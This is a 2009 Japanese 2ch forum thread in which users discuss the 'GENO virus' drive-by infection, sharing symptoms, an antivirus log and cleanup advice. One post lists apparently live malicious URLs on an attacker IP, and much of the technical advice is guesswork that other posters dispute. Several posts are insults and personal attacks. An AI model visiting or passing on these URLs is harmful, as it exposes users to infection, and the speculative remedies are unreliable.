Flash最新版
adobe readerは入れてない
848 : ◆W07s5cWHb. :2009/04/10(金) 15:10:47
>>838
最近の割れ厨はもともと無料なReaderまで割るのかw
最近の割れ厨はもともと無料なReaderまで割るのかw
849 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:41:46
>>844
genoウイルスじゃなくて別のやつって可能性もあるね
genoウイルスじゃなくて別のやつって可能性もあるね
850 :833:2009/04/10(金) 15:45:10
そーいえばwindowsもraederもflashもアップデートは問題なくできた。
結局、主な感染の兆候は無いんだけど、CPU使用率がなんか気になるんだよね。
1秒置きにCPU使用率が7〜100%間を行き来するんだけど、これってセレM420ぐらいだと普通の挙動?
結局、主な感染の兆候は無いんだけど、CPU使用率がなんか気になるんだよね。
1秒置きにCPU使用率が7〜100%間を行き来するんだけど、これってセレM420ぐらいだと普通の挙動?
851 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:50:32
852 : ◆W07s5cWHb. :2009/04/10(金) 15:51:32
>>850
レジストリエディタとかメモ帳もちゃんと起動する?
CPU使用率云々と言ってる位だからタスクマネージャーは起動してるんだと思うけど。
怪しいプロセスを監視するのなら↓をインスコして確認してみたらどうよ?
窓の杜 - Process Explorer
ttp://www.forest.impress.co.jp/lib/sys/wincust/taskservice/prcsxplorer.html
Process Explorer
ttp://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
レジストリエディタとかメモ帳もちゃんと起動する?
CPU使用率云々と言ってる位だからタスクマネージャーは起動してるんだと思うけど。
怪しいプロセスを監視するのなら↓をインスコして確認してみたらどうよ?
窓の杜 - Process Explorer
ttp://www.forest.impress.co.jp/lib/sys/wincust/taskservice/prcsxplorer.html
Process Explorer
ttp://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
853 :833:2009/04/10(金) 15:55:32
regedit試した。問題なく起動。踏んだ時flashは9.0でreaderが7で最新ではなかったけど、Geno踏んだのが4日になる前だから微妙なんだよな。報告出だした4日10時前ならギリセーフなのだろうか・・・?
854 :名無しさん@お腹いっぱい。:2009/04/10(金) 15:58:08
Hijack Thisで調べてみたら?
855 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:03:50
>>853
それ同じインスト環境だ
5日早朝踏んで再起時に終了プロセスの確認出て(開いてないpdf
再起したけどブルースクリーンにはならず
6日にGENOヴィルス知ってバックアップから復元してんで他は不明
それ同じインスト環境だ
5日早朝踏んで再起時に終了プロセスの確認出て(開いてないpdf
再起したけどブルースクリーンにはならず
6日にGENOヴィルス知ってバックアップから復元してんで他は不明
856 : ◆N9P3SuvBPo :2009/04/10(金) 16:03:51
>853
てかお前、P2Pやってんのな。
リカバリ推奨
てかお前、P2Pやってんのな。
リカバリ推奨
857 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:04:12
>>852
感染しててもメモ帳は開くよ
感染しててもメモ帳は開くよ
858 : ◆W07s5cWHb. :2009/04/10(金) 16:05:58
>>853
少なくても4日10時頃なんてのは殆ど大本営発表レベルなんて信じたら負けってレベル。
少なくてもスレ上で最初に報告してた奴が書き込んだ時間がその頃ってだけで、なんの保証も無いから。
で、Genoも恐らくまともに調べずにスレの内容を都合よくテキトーに纏めて無断転載しているに等しいレベル。
結局、>>660の通りってこった。
少なくても4日10時頃なんてのは殆ど大本営発表レベルなんて信じたら負けってレベル。
少なくてもスレ上で最初に報告してた奴が書き込んだ時間がその頃ってだけで、なんの保証も無いから。
で、Genoも恐らくまともに調べずにスレの内容を都合よくテキトーに纏めて無断転載しているに等しいレベル。
結局、>>660の通りってこった。
859 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:06:25
860 : ◆W07s5cWHb. :2009/04/10(金) 16:06:48
>>857
あ、そうだったっけか。こりゃまた失礼。
あ、そうだったっけか。こりゃまた失礼。
861 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:09:55
GENO踏んだ時のログ(キングソフト) 助かったのか…
2009-04-04 12:42:15 ブラウザはバックグランドでファイルC:\DOCUME~1\USER1~~1\Temp\wJQs.exeをダウンロードしました
2009-04-04 12:42:16 ブラウザはバックグランドでファイルC:\DOCUME~1\USER1~~1\Temp\wJQs.exeをダウンロードしました
2009-04-04 12:42:38 ブラウザ上の疑わしいモジュールC:\DOCUME~1\USER1~~1\Temp\wJQs.exeの実行がブロックされました。
2009-04-04 12:42:15 ブラウザはバックグランドでファイルC:\DOCUME~1\USER1~~1\Temp\wJQs.exeをダウンロードしました
2009-04-04 12:42:16 ブラウザはバックグランドでファイルC:\DOCUME~1\USER1~~1\Temp\wJQs.exeをダウンロードしました
2009-04-04 12:42:38 ブラウザ上の疑わしいモジュールC:\DOCUME~1\USER1~~1\Temp\wJQs.exeの実行がブロックされました。
862 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:18:16
まだ感染しっぱなしのサイトあるね…。
今は接続先は死んでるからデータ吸出しの被害は無いと思うけど、
接続先っていつ死んだんだろ…?
今は接続先は死んでるからデータ吸出しの被害は無いと思うけど、
接続先っていつ死んだんだろ…?
863 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:19:18
wJQs.exe の検索結果 約 1,680 件中 1 - 100 件目 (0.40 秒)
864 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:22:21
>862
突撃したらFirefoxクラッシュしたぞ
突撃したらFirefoxクラッシュしたぞ
865 : ◆N9P3SuvBPo :2009/04/10(金) 16:23:05
でもGENOの対応には目を疑います。
せめて『リカバリして下さい』だったらな。
あと、リカバリせずになんとかして駆除しようと頑張ってる人もいるらしいが、
リカバリ自体特別難しいことじゃないですよ。
取り説に方法載ってるんですから。
リカバリしたくないという理由は…
1・リカバリディスクがない
2・取り説なくした
3・バックアップを取ってない
4・取り説読んでもよく分からない
他にもあるんだろうけどよ、1のケースならHDDのリカバリ領域から
リカバリできるのであれば、そこからリカバリすれば良い。
2のケースなら、画面の指示に従っていけば良い。
3のケースなら、即座にバックアップを取るか(バックアップ自体も難しくない)
全てを諦める。
4のケースなら、電気店に直接持ち込んでしてもらう。
せめて『リカバリして下さい』だったらな。
あと、リカバリせずになんとかして駆除しようと頑張ってる人もいるらしいが、
リカバリ自体特別難しいことじゃないですよ。
取り説に方法載ってるんですから。
リカバリしたくないという理由は…
1・リカバリディスクがない
2・取り説なくした
3・バックアップを取ってない
4・取り説読んでもよく分からない
他にもあるんだろうけどよ、1のケースならHDDのリカバリ領域から
リカバリできるのであれば、そこからリカバリすれば良い。
2のケースなら、画面の指示に従っていけば良い。
3のケースなら、即座にバックアップを取るか(バックアップ自体も難しくない)
全てを諦める。
4のケースなら、電気店に直接持ち込んでしてもらう。
866 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:26:11
なんか仕込が増えてるんだけど?
ttp://mag-puppine.com/about/
ttp://94.247.2.195/news/?id=2
ttp://94.247.2.195/news/?id=3
ttp://94.247.2.195/jquery.js
ttp://94.247.2.195/news/?id=101
ttp://mag-puppine.com/about/
ttp://94.247.2.195/news/?id=2
ttp://94.247.2.195/news/?id=3
ttp://94.247.2.195/jquery.js
ttp://94.247.2.195/news/?id=101
867 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:32:37
ttpも抜けよ
専ブラだと普通にリンクされとるわ
専ブラだと普通にリンクされとるわ
868 :833:2009/04/10(金) 16:32:40
>>852-859
さんくす。
さんくす。
869 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:34:41
>>865
USBメモリにでもバックアップしたい・・・んだがこのウイルスが入ってきそうで怖い
USBメモリにでもバックアップしたい・・・んだがこのウイルスが入ってきそうで怖い
870 : ◆N9P3SuvBPo :2009/04/10(金) 16:39:38
>866
たしかに問題のコードがありますね。
俺の環境ではIEで踏んでも問題ありませんが、
他の人はアクセスなさらないように。
>869
USBメモリにバックアップと一緒に入ってしまいそうで怖いのであれば、
やはり、全部諦めろ。という答えしかできません。
たしかに問題のコードがありますね。
俺の環境ではIEで踏んでも問題ありませんが、
他の人はアクセスなさらないように。
>869
USBメモリにバックアップと一緒に入ってしまいそうで怖いのであれば、
やはり、全部諦めろ。という答えしかできません。
871 : ◆W07s5cWHb. :2009/04/10(金) 16:44:48
>>869
ぶっちゃけ、このGonoウィルスは
PDFやFlashの脆弱性を突いてこれらを直に使わないサイトを経由して
強引に感染させちゃうという、斜め上の発想のウィルスなんで、
まだ中身のEXEファイルの解析が完了せず、
処理内容の全貌が明らかになっていない現状では
ちょっとUSBメモリを使用するのはリスキーだよね。
最終的に焼き捨てになるけど、
焼きソフトを使ってCD-RやDVD-R等に焼いた方がまだ安心出来る。
ぶっちゃけ、このGonoウィルスは
PDFやFlashの脆弱性を突いてこれらを直に使わないサイトを経由して
強引に感染させちゃうという、斜め上の発想のウィルスなんで、
まだ中身のEXEファイルの解析が完了せず、
処理内容の全貌が明らかになっていない現状では
ちょっとUSBメモリを使用するのはリスキーだよね。
最終的に焼き捨てになるけど、
焼きソフトを使ってCD-RやDVD-R等に焼いた方がまだ安心出来る。
872 :名無しさん@お腹いっぱい。:2009/04/10(金) 16:53:11
GENO以外で感染の危険性もある(あった)んだから、
ウイルス感染のはっきりした確認方法がないのが厳しい。
ウイルス感染のはっきりした確認方法がないのが厳しい。
873 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:05:26
>>866
URL貼るなキモ豚
URL貼るなキモ豚
874 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:10:15
評判の良い焼きソフト教えてくだしあ><
875 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:14:04
>>866
URL貼るなリアルデブ
URL貼るなリアルデブ
876 : ◆W07s5cWHb. :2009/04/10(金) 17:17:31
>>874
ぶっちゃけ、わざわざ金だして買わなくても
フリーソフトのimgburnで十分だったりする。
使い方とかは日本語化パッチ頒布してる↓に書かれてる。
日本語化パッチ
ttp://www.nihongoka.com/jpatch_main/imgburn
本体頒布元
ttp://www.imgburn.com/
ぶっちゃけ、わざわざ金だして買わなくても
フリーソフトのimgburnで十分だったりする。
使い方とかは日本語化パッチ頒布してる↓に書かれてる。
日本語化パッチ
ttp://www.nihongoka.com/jpatch_main/imgburn
本体頒布元
ttp://www.imgburn.com/
877 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:19:28
>>876
感染PCでそれが動かなくて途方にくれてるんだけど
感染PCでそれが動かなくて途方にくれてるんだけど
878 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:22:27
ggrks
879 : ◆W07s5cWHb. :2009/04/10(金) 17:24:36
880 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:27:44
>>879
全滅じゃないよ 特定のソフトが起動しない
全滅じゃないよ 特定のソフトが起動しない
881 : ◆W07s5cWHb. :2009/04/10(金) 17:32:18
>>880
YesNoで答えて。
1.imgburnが起動すらしないって事?
2.感染以前からimgburnを使ってて以前はちゃんと動作してた?
3.他のライティングソフトを試しても一様に起動しないのか?
YesNoで答えて。
1.imgburnが起動すらしないって事?
2.感染以前からimgburnを使ってて以前はちゃんと動作してた?
3.他のライティングソフトを試しても一様に起動しないのか?
882 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:33:03
もう終わったウイルスだから次スレ必要ないな
そもそもどこもgenoウイルスなんて言ってないし
名誉毀損も肌々しい
そもそもどこもgenoウイルスなんて言ってないし
名誉毀損も肌々しい
883 : ◆W07s5cWHb. :2009/04/10(金) 17:35:06
884 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:35:18
885 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:36:14
大変だね〜がんばって汚名挽回してね〜
886 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:36:35
y
y 数年愛用
他のライティングは試してない
いろんなソフトで影響がでている。
y 数年愛用
他のライティングは試してない
いろんなソフトで影響がでている。
887 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:37:41
GENOの対応は悪いが一番悪いのがGENOって感じの流れで笑える
なんだよGENOウイルスってw
なんだよGENOウイルスってw
888 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:37:54
889 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:40:11
いやあ店員さんも必死だねぇ
890 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:40:24
>>882
肌々しいってなぁに?
肌々しいってなぁに?
891 : ◆W07s5cWHb. :2009/04/10(金) 17:40:44
>>886
レポートどうも。
それだと多分アレだね。レジストリの関連付けとか項目等をグチャクチャにされてしまっているのか、
Explorer.exeが乗っ取られてると、その種のバックアップ等を行えないように
Windows上の特定の機能を殺しちゃってるのかも知れないな。
レポートどうも。
それだと多分アレだね。レジストリの関連付けとか項目等をグチャクチャにされてしまっているのか、
Explorer.exeが乗っ取られてると、その種のバックアップ等を行えないように
Windows上の特定の機能を殺しちゃってるのかも知れないな。
892 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:41:04
893 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:41:49
894 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:43:00
>>883
eBoostr
ホームページビルダー
クリップボード系のアプリ
IE FireFox
ISOを弄くる系のツール
タスクトレイのスタートアップは半分以下しか表示してない
まともに弄る気もなくすくらい使い物にならないから
放置してるw
eBoostr
ホームページビルダー
クリップボード系のアプリ
IE FireFox
ISOを弄くる系のツール
タスクトレイのスタートアップは半分以下しか表示してない
まともに弄る気もなくすくらい使い物にならないから
放置してるw
895 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:44:52
896 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:45:20
このウイルスまじぱねぇ・・・
即死しないのが余計に辛い
「楽にしてくれ」って気持ちがわかってくるまじでw
即死しないのが余計に辛い
「楽にしてくれ」って気持ちがわかってくるまじでw
897 : ◆W07s5cWHb. :2009/04/10(金) 17:48:17
>>894
そこまでやられたらアメリカなら確実に訴訟を起こしちゃうレベルだよなw
もし複数台のPCがあればそっちのPCのアンチウィルスソフトを最新にして
LAN越しにコピーしてウィルスをそっちのPCで駆除して貰いながら
データを移してしまえば良いかと思ったんだけど、
もしかするとライティングソフトの動作を阻害する位なら
普通LAN越しにコピー出来ない様にされちゃってるかも知れないな。
本当に辛いな。その状況は。
そこまでやられたらアメリカなら確実に訴訟を起こしちゃうレベルだよなw
もし複数台のPCがあればそっちのPCのアンチウィルスソフトを最新にして
LAN越しにコピーしてウィルスをそっちのPCで駆除して貰いながら
データを移してしまえば良いかと思ったんだけど、
もしかするとライティングソフトの動作を阻害する位なら
普通LAN越しにコピー出来ない様にされちゃってるかも知れないな。
本当に辛いな。その状況は。
899 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:48:30
900 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:48:38
「このまま使い続けても大丈夫かも・・」と思わせる所があるかもね。
発病してなくてもゴミが残ってるかもしれないのが嫌だ。
クリーンインストールって言葉が実に良く出来てると実感w
発病してなくてもゴミが残ってるかもしれないのが嫌だ。
クリーンインストールって言葉が実に良く出来てると実感w
901 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:50:06
902 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:51:34
なんかぶっ飛んだ憶測でスレが進行してますが(笑
誰も突っ込まないあたり感染実験してた人たちはいなくなっちゃったのかな
誰も突っ込まないあたり感染実験してた人たちはいなくなっちゃったのかな
>>900
そうなのよ
再インストールするにも、4年もごちゃごちゃ使ったOSで
バックアップ作業が困難なんだわ。
なので、セキュリティーソフトの神対応を待つ事にしてる。
でもOSが破壊されてるのはわかってるんだ・・・(遠い目
そうなのよ
再インストールするにも、4年もごちゃごちゃ使ったOSで
バックアップ作業が困難なんだわ。
なので、セキュリティーソフトの神対応を待つ事にしてる。
でもOSが破壊されてるのはわかってるんだ・・・(遠い目
904 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:55:04
>ボットネットってIRC
!!?
!!?
905 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:55:36
>>903
いや、被害者なのが判ってるならクリーンインストールしなよw
いや、被害者なのが判ってるならクリーンインストールしなよw
906 : ◆W07s5cWHb. :2009/04/10(金) 17:55:51
あと、蛇足ながら一言言うと
バックアップ時にFTPだけは仮に使えても極力使わないほうがいいと思う。
Explorer.exeがジャックされてウィルスをまともに食らってる状態だと
FTPログイン先やアカウント名、パスワード等が
クラッカーに漏れる可能性も十分にあり得そう。
で、クラッカーにそのログイン先のターゲットにされてしまうと。
接続先がイントラのFTP鯖だとその点どうにかなるかもしれないけど。
バックアップ時にFTPだけは仮に使えても極力使わないほうがいいと思う。
Explorer.exeがジャックされてウィルスをまともに食らってる状態だと
FTPログイン先やアカウント名、パスワード等が
クラッカーに漏れる可能性も十分にあり得そう。
で、クラッカーにそのログイン先のターゲットにされてしまうと。
接続先がイントラのFTP鯖だとその点どうにかなるかもしれないけど。
>>897
他のPCからアクセスするのも怖いw
といっても、ルーターですでに繋がってるけどね。
とりあえずUSBメモリにデータ入れる事はできたから
最悪はUSBメモリでバックアップしてOS入れなおす事にするよ
他のPCからアクセスするのも怖いw
といっても、ルーターですでに繋がってるけどね。
とりあえずUSBメモリにデータ入れる事はできたから
最悪はUSBメモリでバックアップしてOS入れなおす事にするよ
908 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:57:09
GENOって結局本当にウイルスばらまいてたの?
感染の確認方法いまだにちゃんとでてないけど
ウイルスってやっぱりデマだったの?
感染の確認方法いまだにちゃんとでてないけど
ウイルスってやっぱりデマだったの?
909 :名無しさん@お腹いっぱい。:2009/04/10(金) 17:57:24
910 : ◆W07s5cWHb. :2009/04/10(金) 17:57:48
>>907
USBのブートレコードへの感染にはくれぐれも注意したほうがいいよ。
USBのブートレコードへの感染にはくれぐれも注意したほうがいいよ。
913 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:02:12
>>909
WikiのURLまで出して間違えに気づいてないのかお前は
WikiのURLまで出して間違えに気づいてないのかお前は
914 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:04:29
>>910
いい加減な憶測はやめようねw
いい加減な憶測はやめようねw
915 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:04:45
こういうヤツがウイルスに感染して
ウイルスに感染したからこんなとこに貼り付いてるんだよな
ウイルスに感染したからこんなとこに貼り付いてるんだよな
916 : ◆W07s5cWHb. :2009/04/10(金) 18:08:16
>>914
keianのSSDも出荷段階で感染してた位だから油断出来ないぞw
ttp://www.keian.co.jp/
ttp://pc.watch.impress.co.jp/docs/2009/0408/keian.htm
keianのSSDも出荷段階で感染してた位だから油断出来ないぞw
ttp://www.keian.co.jp/
ttp://pc.watch.impress.co.jp/docs/2009/0408/keian.htm
917 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:09:19
http://takeshima.2ch.net/test/read.cgi/news4vip/1239059037/
441 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 19:52:26.14 ID:jaXpHGCM0
URLの特徴は短縮が主
だけどyahooのトップの気付いたら飛ばされてるパターンも
あるから、一概に言えない
その場合
リンク踏み→ウイルスURL(非表示)→yahooトップ
とウイルスを持ってるサイトが表示されない可能性が高い
こういうのはバックドア系の典型で、ウイルス作成者が商用
にしてる可能性が高いことを裏付けるな
443 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 19:57:41.08 ID:jaXpHGCM0
特にスパイウェア系のファイルがwindowsフォルダ内に
ランダムに生成されてしまうのがやっかい
その場合conime.exeの他にPDFだったり、windowsファイルに実際に存在する
ファイルと同一名称で生成されてしまうので検索も面倒
ただ生成されるファイルの多くが容量17kbだったりと共通点もある
441 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 19:52:26.14 ID:jaXpHGCM0
URLの特徴は短縮が主
だけどyahooのトップの気付いたら飛ばされてるパターンも
あるから、一概に言えない
その場合
リンク踏み→ウイルスURL(非表示)→yahooトップ
とウイルスを持ってるサイトが表示されない可能性が高い
こういうのはバックドア系の典型で、ウイルス作成者が商用
にしてる可能性が高いことを裏付けるな
443 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 19:57:41.08 ID:jaXpHGCM0
特にスパイウェア系のファイルがwindowsフォルダ内に
ランダムに生成されてしまうのがやっかい
その場合conime.exeの他にPDFだったり、windowsファイルに実際に存在する
ファイルと同一名称で生成されてしまうので検索も面倒
ただ生成されるファイルの多くが容量17kbだったりと共通点もある
918 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:13:02
>>916
何度もいうがバックアップの類は大丈夫だといってるだろ
何度もいうがバックアップの類は大丈夫だといってるだろ
919 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:13:47
カスペでも検出できない様に改変されてるっぽいのだけど
920 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:24:43
921 : ◆W07s5cWHb. :2009/04/10(金) 18:25:00
923 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:32:12
検知しました: トロイの木馬 Exploit.JS.Pdfka.gz
URL: http://94.247.2.195/news/?id=2//data0000
というのが加わった
URL: http://94.247.2.195/news/?id=2//data0000
というのが加わった
924 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:33:38
川崎病並みにウイルス名が店名ってすばらしい
ジェノはノーベル賞やギネスビールに並んだ
ジェノはノーベル賞やギネスビールに並んだ
925 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:34:12
とりあえず乗っ取られてるサーバ全部止めて欲しいわ…
926 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:35:09
>>921
USBメモリに感染を試みるような大胆なウイルスならこんなに手間取ってないからw
憶測で物を言う前に少しは自分で調べてみたら?
>>922
そもそもこいつがウイルスに感染したという前提になってるところからしておかしい。
確証もないのに勝手にウイルスと結びつけてリカバリー指示ですか。
USBメモリに感染を試みるような大胆なウイルスならこんなに手間取ってないからw
憶測で物を言う前に少しは自分で調べてみたら?
>>922
そもそもこいつがウイルスに感染したという前提になってるところからしておかしい。
確証もないのに勝手にウイルスと結びつけてリカバリー指示ですか。
927 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:35:56
新たなウイルスをスパイウェアを呼び込む
部分的にレジストリ改変・破壊。各所に複製
PCの不具合が徐々に増えていって、最後にブルースクリーンあぽーん
部分的にレジストリ改変・破壊。各所に複製
PCの不具合が徐々に増えていって、最後にブルースクリーンあぽーん
928 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:39:42
GENOウイルスとか業務妨害になるような
スレタイよく平気でつかられるな
どうせ人生捨てているニートなんだろうがwww
スレタイよく平気でつかられるな
どうせ人生捨てているニートなんだろうがwww
929 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:40:55
> 業務妨害
930 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:41:15
931 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:45:17
TROJ_GENOME.BKがどうかした?
932 : ◆W07s5cWHb. :2009/04/10(金) 18:45:46
>>928
華麗で可憐な有閑マダムです><
華麗で可憐な有閑マダムです><
>>926
工作するならもっと上手くやった方がいいと思う。
工作するならもっと上手くやった方がいいと思う。
934 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:49:31
935 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:50:16
936 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:52:46
937 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:54:02
938 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:54:51
>>934は自分の脳内のウイルスも駆除できてない模様
939 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:55:20
>>937
おk、把握。ありがとう
おk、把握。ありがとう
940 :名無しさん@お腹いっぱい。:2009/04/10(金) 18:57:11
>>938
煽りならν速でやれ
煽りならν速でやれ
941 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:00:04
>>932自演してるってことはばれてるよw
942 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:04:22
ID無しでやってきてるセキュ板住民の目は誤魔化せないよ!
943 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:06:11
無料オンラインスキャン10選、PCの安全性をブラウザでチェックニュース - page10 - CNET Japan
ttp://japan.cnet.com/news/sec/story/0,2000056024,20391377-10,00.htm
ttp://japan.cnet.com/news/sec/story/0,2000056024,20391377-10,00.htm
944 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:08:01
>>943
無料オンラインスキャン10選、PCの安全性をブラウザでチェックニュース - CNET Japan
ttp://japan.cnet.com/news/sec/story/0,2000056024,20391377,00.htm
最初のページを紹介しないと。
無料オンラインスキャン10選、PCの安全性をブラウザでチェックニュース - CNET Japan
ttp://japan.cnet.com/news/sec/story/0,2000056024,20391377,00.htm
最初のページを紹介しないと。
945 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:13:26
赤い傘最強伝説
946 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:15:16
それを言うなら赤帽だろw
947 : ◆W07s5cWHb. :2009/04/10(金) 19:16:09
>>941
一応、これでも音響カプラ全盛期からネットを利用している位に
無駄に暦だけは長い元あめざーな古参だから、
その気になればいくらでもジサクジエン位は出来るけどさw
てか、ぶっちゃけ、ダイアルアップ時代は
複数のプロバイダを駆使して回線つなぎ舞えて完璧な迷彩を施してジサクジエンしてスレを伸ばしたりしたけど、
今更IDでない過疎板でベタな釣りして遊ぶ程、落ちぶれてはいないよw
まぁ、あれだ。この前、某過疎板に誤爆しちゃったけどなw
一応、これでも音響カプラ全盛期からネットを利用している位に
無駄に暦だけは長い元あめざーな古参だから、
その気になればいくらでもジサクジエン位は出来るけどさw
てか、ぶっちゃけ、ダイアルアップ時代は
複数のプロバイダを駆使して回線つなぎ舞えて完璧な迷彩を施してジサクジエンしてスレを伸ばしたりしたけど、
今更IDでない過疎板でベタな釣りして遊ぶ程、落ちぶれてはいないよw
まぁ、あれだ。この前、某過疎板に誤爆しちゃったけどなw
948 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:18:52
このスレ見てるニュー速民いたら>>947を今すぐ持って帰れ
949 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:20:53
>948
返品不可
返品不可
950 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:22:34
不妊ババって奴?
951 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:25:50
>元美人秘書室長◆W07s5cWHb.
>(千葉県)の妄想虚言癖嫌われ池沼(beコテ)。千葉ババア、うんうんババアなどと呼ばれる。
>自信過剰、自意識過剰、妄想、嘘、知ったかぶり、全レス状態など
>異常に古参ぶるもそれ程ではない。他板でも嫌われている。
キチガイばっかセキュ板に来る。
どういうことだこれ。
>(千葉県)の妄想虚言癖嫌われ池沼(beコテ)。千葉ババア、うんうんババアなどと呼ばれる。
>自信過剰、自意識過剰、妄想、嘘、知ったかぶり、全レス状態など
>異常に古参ぶるもそれ程ではない。他板でも嫌われている。
キチガイばっかセキュ板に来る。
どういうことだこれ。
952 : ◆W07s5cWHb. :2009/04/10(金) 19:32:00
それは、おいらに粘着してる基地外が書いたのだよ。
昔木っ端微塵に論破した奴か罵倒して遊んでいた相手か
荒らし系コテをヲチして遊んでいたら逆恨みされてるとか、そんな感じで。
無駄に歴が長いんで、無駄に敵が多いんだよ。そこんとこ判れ。
てか、そもそもあのν速コテ図鑑は
ν速で毎回VBS.Loveletterをコピペして貼り付ける事で有名だった
某基地外コテが開設しているサイトだ。
押して知るべし。
昔木っ端微塵に論破した奴か罵倒して遊んでいた相手か
荒らし系コテをヲチして遊んでいたら逆恨みされてるとか、そんな感じで。
無駄に歴が長いんで、無駄に敵が多いんだよ。そこんとこ判れ。
てか、そもそもあのν速コテ図鑑は
ν速で毎回VBS.Loveletterをコピペして貼り付ける事で有名だった
某基地外コテが開設しているサイトだ。
押して知るべし。
953 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:32:14
>>951
見事にあてはまってるね
見事にあてはまってるね
954 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:36:39
>>951
うわ…きも
うわ…きも
955 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:36:57
>>952
DAPのスレ来てる人?
DAPのスレ来てる人?
956 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:37:20
◆W07s5cWHb. ←こいつの相手は薮パソユーザーと八頭に任せた。
957 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:38:38
ちょっと待て
その書き込みは
GENOかも
その書き込みは
GENOかも
958 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:39:06
とりあえず有用な情報を書いて欲しい。まぁでも明日の朝で一週間なんだな
959 :名無しさん@お腹いっぱい。:2009/04/10(金) 19:40:39
ttp://ecnavi.jp/help/information/info/221/
09/04/10[障害・サポート情報] 【重要】掲載のリンク先ページのウイルス感染について
お知らせ
【重要】ECナビの掲載広告にて発生したリンク先ページのウイルス感染について
この度、ECナビサイトにて掲載を行っておりました広告にてリンク先ページが
改ざんされた可能性があり、広告をクリックして遷移先ページを閲覧した
ご利用者様がウイルスに感染した可能性があるという事態が発生しました。
なお、対象となる広告は下記となります。
■対象広告
puppine(株式会社ブランジスタ)
■掲載期間、箇所
【4/2〜4/9 ポイントチャンス!】
://ecnavi.jp/frame/?url=http%3A%2F%2Fkensho.ecnavi.jp%2Fsearch%2F&KID=&search=&order=new
愛犬と一緒に楽しめる最新ライフスタイル情報が満載「puppine」
【4/9〜4/10 宝くじ ガラガラでポン!】
://point.ecnavi.jp/campaign/lottery/game/
ペットとわたしの新感覚ウェブマガジン「puppine」
※ECナビでは上記の危険認識により、4月10日 15時に広告掲載を停止いたしました。
今回のウィルスに関しましては、Flash/Adobe Readerの既知の脆弱性を悪用するもので、
最新版をお使いならば感染の危険がないという情報もございます。
しかしながら、被害状況等の詳細に関しましては現在掲載サイトにて確認を行っております。
状況が分かり次第再度ご報告させていただきますので、
今しばらくお待ちくださいますようお願いいたします。
09/04/10[障害・サポート情報] 【重要】掲載のリンク先ページのウイルス感染について
お知らせ
【重要】ECナビの掲載広告にて発生したリンク先ページのウイルス感染について
